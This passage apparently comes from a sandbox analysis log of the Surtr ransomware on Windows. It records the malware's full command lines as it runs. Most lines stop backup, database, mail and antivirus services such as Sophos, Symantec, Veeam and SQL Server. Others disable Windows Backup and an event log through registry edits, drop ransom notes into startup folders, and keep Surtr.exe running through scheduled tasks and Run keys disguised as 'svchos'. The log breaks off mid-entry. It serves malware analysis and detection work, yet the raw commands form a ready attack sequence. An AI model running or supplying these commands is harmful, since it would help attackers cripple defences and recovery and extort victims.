C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MMS"3⤵PID:212
-
C:\Windows\system32\net.exenet stop "MMS"4⤵PID:484
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MMS"5⤵PID:2816
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f3⤵PID:2348
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f4⤵PID:2476
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f3⤵PID:2752
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f4⤵PID:1296
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "mozyprobackup"3⤵PID:2916
-
C:\Windows\system32\net.exenet stop "mozyprobackup"4⤵PID:2292
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "mozyprobackup"5⤵PID:316
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f3⤵PID:2892
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f4⤵PID:2792
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MsDtsServer"3⤵PID:228
-
C:\Windows\system32\net.exenet stop "MsDtsServer"4⤵PID:2764
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MsDtsServer"5⤵PID:2180
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f3⤵PID:2244
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f4⤵PID:588
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f3⤵PID:2136
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f4⤵PID:1984
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MsDtsServer100"3⤵PID:708
-
C:\Windows\system32\net.exenet stop "MsDtsServer100"4⤵PID:2784
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MsDtsServer100"5⤵PID:2908
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f3⤵PID:2912
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f4⤵PID:1948
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MsDtsServer110"3⤵PID:884
-
C:\Windows\system32\net.exenet stop "MsDtsServer110"4⤵PID:1000
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MsDtsServer110"5⤵PID:204
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSExchangeES"3⤵PID:2044
-
C:\Windows\system32\net.exenet stop "MSExchangeES"4⤵PID:1876
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSExchangeES"5⤵PID:224
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSExchangeIS"3⤵PID:200
-
C:\Windows\system32\net.exenet stop "MSExchangeIS"4⤵PID:1652
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSExchangeIS"5⤵PID:1268
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c mkdir "C:\ProgramData\Service"3⤵PID:2564
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSExchangeMGMT"3⤵PID:2876
-
C:\Windows\system32\net.exenet stop "MSExchangeMGMT"4⤵PID:1960
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSExchangeMGMT"5⤵PID:2384
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c mkdir "%TEMP%\Service"3⤵PID:2856
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta"3⤵
- Drops startup file
PID:1136
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.txt" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt"3⤵
- Drops startup file
PID:2776
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSExchangeMTA"3⤵PID:2372
-
C:\Windows\system32\net.exenet stop "MSExchangeMTA"4⤵PID:2812
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSExchangeMTA"5⤵PID:2112
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%TEMP%\Service\Surtr.exe"3⤵PID:560
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Public_DATA.surt" "%TEMP%\Service\Public_DATA.surt"3⤵PID:1944
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSExchangeSA"3⤵PID:1776
-
C:\Windows\system32\net.exenet stop "MSExchangeSA"4⤵PID:940
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSExchangeSA"5⤵PID:2592
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Private_DATA.surt" "%TEMP%\Service\Private_DATA.surt"3⤵PID:800
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\ID_DATA.surt" "%TEMP%\Service\ID_DATA.surt"3⤵PID:968
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.hta" "%TEMP%\Service\SURTR_README.hta"3⤵PID:236
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSExchangeSRS"3⤵PID:1680
-
C:\Windows\system32\net.exenet stop "MSExchangeSRS"4⤵PID:1400
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSExchangeSRS"5⤵PID:1256
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.txt" "%TEMP%\Service\SURTR_README.txt"3⤵PID:2788
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +R /S "C:\ProgramData\Service"3⤵PID:2700
-
C:\Windows\system32\attrib.exeattrib +R /S "C:\ProgramData\Service"4⤵
- Views/modifies file attributes
PID:1564
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSOLAP$SQL_2008"3⤵PID:1756
-
C:\Windows\system32\net.exenet stop "MSOLAP$SQL_2008"4⤵PID:1616
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSOLAP$SQL_2008"5⤵PID:1356
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSOLAP$SYSTEM_BGC"3⤵PID:448
-
C:\Windows\system32\net.exenet stop "MSOLAP$SYSTEM_BGC"4⤵PID:1620
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSOLAP$SYSTEM_BGC"5⤵PID:2548
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +R /S "%TEMP%\Service"3⤵PID:1824
-
C:\Windows\system32\attrib.exeattrib +R /S "C:\Users\Admin\AppData\Local\Temp\Service"4⤵
- Views/modifies file attributes
PID:2032
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSOLAP$TPS"3⤵PID:2844
-
C:\Windows\system32\net.exenet stop "MSOLAP$TPS"4⤵PID:1016
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSOLAP$TPS"5⤵PID:2760
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F3⤵PID:3004
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F4⤵
- Scheduled Task/Job: Scheduled Task
PID:1328
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSOLAP$TPSAMA"3⤵PID:3028
-
C:\Windows\system32\net.exenet stop "MSOLAP$TPSAMA"4⤵PID:1872
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSOLAP$TPSAMA"5⤵PID:2896
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$BKUPEXEC"3⤵PID:2732
-
C:\Windows\system32\net.exenet stop "MSSQL$BKUPEXEC"4⤵PID:2356
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$BKUPEXEC"5⤵PID:1536
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$ECWDB2"3⤵PID:996
-
C:\Windows\system32\net.exenet stop "MSSQL$ECWDB2"4⤵PID:2756
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$ECWDB2"5⤵PID:2688
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$PRACTICEMGT"3⤵PID:2272
-
C:\Windows\system32\net.exenet stop "MSSQL$PRACTICEMGT"4⤵PID:1044
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$PRACTICEMGT"5⤵PID:1292
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F3⤵PID:2512
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F4⤵
- Scheduled Task/Job: Scheduled Task
PID:1796
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$PRACTTICEBGC"3⤵PID:296
-
C:\Windows\system32\net.exenet stop "MSSQL$PRACTTICEBGC"4⤵PID:1952
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$PRACTTICEBGC"5⤵PID:2284
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$PROFXENGAGEMENT"3⤵PID:2440
-
C:\Windows\system32\net.exenet stop "MSSQL$PROFXENGAGEMENT"4⤵PID:1700
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$PROFXENGAGEMENT"5⤵PID:564
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe"3⤵
- Drops startup file
PID:2940
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f3⤵PID:2212
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f4⤵
- Adds Run key to start application
PID:600
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$SBSMONITORING"3⤵PID:2160
-
C:\Windows\system32\net.exenet stop "MSSQL$SBSMONITORING"4⤵PID:548
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$SBSMONITORING"5⤵PID:2168
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f3⤵PID:2460
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f4⤵
- Adds Run key to start application
PID:1316
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$SHAREPOINT"3⤵PID:2724
-
C:\Windows\system32\net.exenet stop "MSSQL$SHAREPOINT"4⤵PID:2216
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$SHAREPOINT"5⤵PID:2456
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f3⤵PID:2656
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f4⤵
- Adds Run key to start application
PID:1364
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$SQL_2008"3⤵PID:1696
-
C:\Windows\system32\net.exenet stop "MSSQL$SQL_2008"4⤵PID:920
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$SQL_2008"5⤵PID:2368
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f3⤵PID:2436
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f4⤵
- Adds Run key to start application
PID:1040
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$SYSTEM_BGC"3⤵PID:2396
-
C:\Windows\system32\net.exenet stop "MSSQL$SYSTEM_BGC"4⤵PID:2900
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$SYSTEM_BGC"5⤵PID:2984
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$TPS"3⤵PID:708
-
C:\Windows\system32\net.exenet stop "MSSQL$TPS"4⤵PID:2964
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$TPS"5⤵PID:2320
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$TPSAMA"3⤵PID:1960
-
C:\Windows\system32\net.exenet stop "MSSQL$TPSAMA"4⤵PID:1868
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$TPSAMA"5⤵PID:2000
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2008R2"3⤵PID:3036
-
C:\Windows\system32\net.exenet stop "MSSQL$VEEAMSQL2008R2"4⤵PID:1328
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2"5⤵PID:1292
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2012"3⤵PID:296
-
C:\Windows\system32\net.exenet stop "MSSQL$VEEAMSQL2012"4⤵PID:2940
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2012"5⤵PID:564
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher"3⤵PID:2256
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher"4⤵PID:2352
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher"5⤵PID:1104
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$PROFXENGAGEMENT"3⤵PID:2216
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$PROFXENGAGEMENT"4⤵PID:2656
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$PROFXENGAGEMENT"5⤵PID:1040
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SBSMONITORING"3⤵PID:212
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$SBSMONITORING"4⤵PID:2752
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$SBSMONITORING"5⤵PID:2608
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SHAREPOINT"3⤵PID:2104
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$SHAREPOINT"4⤵PID:2568
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$SHAREPOINT"5⤵PID:2100
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SQL_2008"3⤵PID:2076
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$SQL_2008"4⤵PID:2312
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$SQL_2008"5⤵PID:2180
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SYSTEM_BGC"3⤵PID:2764
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$SYSTEM_BGC"4⤵PID:228
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$SYSTEM_BGC"5⤵PID:1984
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$TPS"3⤵PID:216
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$TPS"4⤵PID:436
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$TPS"5⤵PID:2148
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$TPSAMA"3⤵PID:560
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$TPSAMA"4⤵PID:2812
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$TPSAMA"5⤵PID:2144
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLSERVER"3⤵PID:592
-
C:\Windows\system32\net.exenet stop "MSSQLSERVER"4⤵PID:624
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLSERVER"5⤵PID:1816
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLServerADHelper100"3⤵PID:2804
-
C:\Windows\system32\net.exenet stop "MSSQLServerADHelper100"4⤵PID:1580
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLServerADHelper100"5⤵PID:2592
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLServerOLAPService"3⤵PID:2164
-
C:\Windows\system32\net.exenet stop "MSSQLServerOLAPService"4⤵PID:2308
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLServerOLAPService"5⤵PID:1776
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MySQL80"3⤵PID:576
-
C:\Windows\system32\net.exenet stop "MySQL80"4⤵PID:1756
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MySQL80"5⤵PID:1616
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MySQL57"3⤵PID:1680
-
C:\Windows\system32\net.exenet stop "MySQL57"4⤵PID:1832
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MySQL57"5⤵PID:2068
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "OracleClientCache80"3⤵PID:2860
-
C:\Windows\system32\net.exenet stop "OracleClientCache80"4⤵PID:984
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "OracleClientCache80"5⤵PID:600
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "PDVFSService"3⤵PID:2456
-
C:\Windows\system32\net.exenet stop "PDVFSService"4⤵PID:2160
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "PDVFSService"5⤵PID:1624
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "POP3Svc"3⤵PID:1296
-
C:\Windows\system32\net.exenet stop "POP3Svc"4⤵PID:3068
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "POP3Svc"5⤵PID:2180
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ReportServer"3⤵PID:844
-
C:\Windows\system32\net.exenet stop "ReportServer"4⤵PID:2468
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ReportServer"5⤵PID:1992
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ReportServer$SQL_2008"3⤵PID:2260
-
C:\Windows\system32\net.exenet stop "ReportServer$SQL_2008"4⤵PID:2896
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ReportServer$SQL_2008"5⤵PID:2020
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ReportServer$SYSTEM_BGC"3⤵PID:548
-
C:\Windows\system32\net.exenet stop "ReportServer$SYSTEM_BGC"4⤵PID:2168
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ReportServer$SYSTEM_BGC"5⤵PID:600
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ReportServer$TPS"3⤵PID:2172
-
C:\Windows\system32\net.exenet stop "ReportServer$TPS"4⤵PID:2276
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ReportServer$TPS"5⤵PID:2368
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ReportServer$TPSAMA"3⤵PID:920
-
C:\Windows\system32\net.exenet stop "ReportServer$TPSAMA"4⤵PID:1696
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ReportServer$TPSAMA"5⤵PID:484
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "RESvc"3⤵PID:2088
-
C:\Windows\system32\net.exenet stop "RESvc"4⤵PID:588
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "RESvc"5⤵PID:2136
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "sacsvr"3⤵PID:2908
-
C:\Windows\system32\net.exenet stop "sacsvr"4⤵PID:2984
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "sacsvr"5⤵PID:2396
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SamSs"3⤵PID:316
-
C:\Windows\system32\net.exenet stop "SamSs"4⤵PID:1748
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs"5⤵PID:204
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SAVAdminService"3⤵PID:1736
-
C:\Windows\system32\net.exenet stop "SAVAdminService"4⤵PID:2648
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SAVAdminService"5⤵PID:2840
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SAVService"3⤵PID:1652
-
C:\Windows\system32\net.exenet stop "SAVService"4⤵PID:2384
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SAVService"5⤵PID:1100
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Smcinst"3⤵PID:2944
-
C:\Windows\system32\net.exenet stop "Smcinst"4⤵PID:1792
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Smcinst"5⤵PID:2764
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SmcService"3⤵PID:2236
-
C:\Windows\system32\net.exenet stop "SmcService"4⤵PID:2776
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SmcService"5⤵PID:436
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SMTPSvc"3⤵PID:2112
-
C:\Windows\system32\net.exenet stop "SMTPSvc"4⤵PID:2312
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SMTPSvc"5⤵PID:560
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SNAC"3⤵PID:2412
-
C:\Windows\system32\net.exenet stop "SNAC"4⤵PID:1016
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SNAC"5⤵PID:1872
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SntpService"3⤵PID:2976
-
C:\Windows\system32\net.exenet stop "SntpService"4⤵PID:796
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SntpService"5⤵PID:2260
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "sophossps"3⤵PID:468
-
C:\Windows\system32\net.exenet stop "sophossps"4⤵PID:2636
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "sophossps"5⤵PID:1540
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$BKUPEXEC"3⤵PID:2424
-
C:\Windows\system32\net.exenet stop "SQLAgent$BKUPEXEC"4⤵PID:824
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$BKUPEXEC"5⤵PID:1624
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$ECWDB2"3⤵PID:2752
-
C:\Windows\system32\net.exenet stop "SQLAgent$ECWDB2"4⤵PID:2460
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$ECWDB2"5⤵PID:484
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$PRACTTICEBGC"3⤵PID:1696
-
C:\Windows\system32\net.exenet stop "SQLAgent$PRACTTICEBGC"4⤵PID:920
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$PRACTTICEBGC"5⤵PID:2892
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$PRACTTICEMGT"3⤵PID:1804
-
C:\Windows\system32\net.exenet stop "SQLAgent$PRACTTICEMGT"4⤵PID:2620
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$PRACTTICEMGT"5⤵PID:2792
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$PROFXENGAGEMENT"3⤵PID:588
-
C:\Windows\system32\net.exenet stop "SQLAgent$PROFXENGAGEMENT"4⤵PID:2432
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$PROFXENGAGEMENT"5⤵PID:2784
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$SBSMONITORING"3⤵PID:2908
-
